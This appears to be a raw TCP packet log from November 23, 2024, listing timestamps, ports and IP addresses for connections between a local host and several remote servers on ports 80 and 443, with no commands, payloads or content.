Nov 23, 2024 12:47:19.632198095 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.632241011 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.633722067 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.633851051 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.633898973 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.635370970 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.635485888 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.635533094 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.636969090 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.637089968 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.637135029 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.638598919 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.638700962 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.638768911 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.640208006 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.640330076 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.641608953 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.641848087 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.641952038 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.641997099 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.643450975 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.643531084 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.643579006 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.645122051 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.645220995 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.645268917 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.646713972 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.646876097 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.647161961 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.648375988 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.648458958 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.650085926 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.650126934 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.650165081 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.650563002 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.652427912 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.652524948 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.652571917 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.653184891 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.653301954 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.654824018 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.654874086 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.654926062 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.656332970 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.656441927 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.656559944 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.658312082 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.658360958 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.658437014 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.658485889 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.659719944 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.659833908 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.659933090 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.661329031 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.661412954 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.661461115 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.662951946 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.663077116 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.663122892 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.664556026 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.664733887 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.664781094 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.666191101 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.666321039 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.667629957 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.667854071 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.667952061 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.667994976 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.669476032 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.669612885 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.669703960 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.808322906 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.808397055 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.808475971 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.808870077 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.808967113 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.809401035 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.810489893 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.811059952 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.811110973 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.811172962 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.812695980 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.812880993 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.812932014 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.814403057 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.814450979 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.814519882 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.815960884 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.816067934 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.816116095 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.817572117 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.817687035 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.817742109 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.819211960 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.819252968 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.819338083 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.820918083 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.820957899 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.821005106 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.822438955 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.822541952 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.822581053 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.824065924 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.824101925 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.824177980 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.825725079 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.825834036 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.825882912 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.827321053 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.827528000 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.827574968 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.828949928 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.829063892 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.829106092 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.830573082 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.830616951 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.830688000 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.832210064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.832256079 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.832279921 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.833865881 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.833967924 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.834026098 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.835481882 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.835516930 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.835589886 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.837107897 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.837248087 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.837294102 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.838713884 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.838862896 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.838913918 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.840321064 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.840367079 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.840425014 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.841941118 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.841983080 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.842072964 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.843566895 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.843615055 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:19.843661070 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:19.894459963 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:23.901217937 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:23.901282072 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:23.901804924 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:23.902909994 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:23.902925968 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:25.179148912 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:25.179692030 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:25.212378979 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:25.212409973 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:25.213337898 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:25.360244036 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:25.384969950 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:25.385049105 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:25.385202885 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:26.072576046 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:26.072817087 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:26.072882891 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:26.075042963 CET	49741	443	192.168.2.4	172.67.184.174
Nov 23, 2024 12:47:26.075066090 CET	443	49741	172.67.184.174	192.168.2.4
Nov 23, 2024 12:47:26.575145006 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:26.575191975 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:26.575284958 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:26.575887918 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:26.575917959 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:27.796180010 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:27.796297073 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:27.800462961 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:27.800497055 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:27.800920963 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:27.803416967 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:27.803544998 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:27.803582907 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:28.498003960 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:28.498262882 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:28.498331070 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:28.504858971 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:28.504906893 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:28.504935980 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:28.504952908 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:28.656552076 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:28.656579971 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:28.656651020 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:28.661761999 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:28.661775112 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:29.882132053 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:29.882268906 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:29.883622885 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:29.883635044 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:29.883836985 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:29.892131090 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:29.892205000 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:29.892286062 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.610925913 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611063957 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611181021 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611237049 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.611257076 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611315966 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.611321926 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611447096 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611536980 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611586094 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.611593962 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.611628056 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.618925095 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.627346992 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.630521059 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.630530119 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.672797918 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.672806025 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.719634056 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.730676889 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.782135963 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.802186012 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.802385092 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.802479029 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.802490950 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.802618027 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.802818060 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.802866936 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.802881956 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.802891970 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.802900076 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.953701973 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.953747988 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:30.953840971 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.954272985 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:30.954304934 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:32.221426010 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:32.221520901 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:32.222870111 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:32.222903013 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:32.223249912 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:32.224522114 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:32.224683046 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:32.224726915 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:32.224802971 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:32.224818945 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:33.068965912 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:33.069216013 CET	443	49748	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:33.069437981 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:33.069437981 CET	49748	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:33.207850933 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:33.207890987 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:33.207988977 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:33.208334923 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:33.208353043 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:34.437397003 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:34.437519073 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:34.438998938 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:34.439013004 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:34.439385891 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:34.440721035 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:34.440896988 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:34.440936089 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:35.201395988 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:35.201632977 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:35.201684952 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:35.201731920 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:35.201749086 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:35.455169916 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:35.455231905 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:35.455306053 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:35.455643892 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:35.455662012 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:36.720293045 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:36.720381975 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:36.721649885 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:36.721666098 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:36.722035885 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:36.723275900 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:36.723450899 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:36.723490000 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:36.723546982 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:36.723560095 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:37.605357885 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:37.605623960 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:37.605675936 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:37.605784893 CET	49751	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:37.605803967 CET	443	49751	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:38.250832081 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:38.250910044 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:38.251003981 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:38.251373053 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:38.251405954 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:39.525068045 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:39.525155067 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:39.526496887 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:39.526525974 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:39.526932955 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:39.528182030 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:39.528276920 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:39.528290033 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:40.236701965 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:40.236946106 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:40.237015963 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:40.237257957 CET	49752	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:40.237282991 CET	443	49752	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:40.659241915 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:40.659301043 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:40.659379005 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:40.660136938 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:40.660162926 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:41.971949100 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:41.972081900 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:41.973910093 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:41.973927021 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:41.974140882 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:41.981420040 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:41.981554031 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:41.981565952 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:43.101064920 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:43.101315022 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:43.101392984 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:43.101464033 CET	49754	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:43.101500034 CET	443	49754	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:43.132278919 CET	49756	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:43.132358074 CET	443	49756	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:43.132473946 CET	49756	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:43.132922888 CET	49756	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:43.132956028 CET	443	49756	104.21.88.250	192.168.2.4
Nov 23, 2024 12:47:43.665731907 CET	49756	443	192.168.2.4	104.21.88.250
Nov 23, 2024 12:47:53.937416077 CET	49762	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:53.937462091 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:53.937546015 CET	49762	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:53.940888882 CET	49762	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:53.940918922 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:55.305840015 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:55.305919886 CET	49762	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:55.308764935 CET	49762	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:55.308790922 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:55.309138060 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:55.316344023 CET	49762	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:55.359374046 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:55.774399996 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:55.774605989 CET	443	49762	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:55.774718046 CET	49762	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:55.777194977 CET	49762	443	192.168.2.4	34.117.59.81
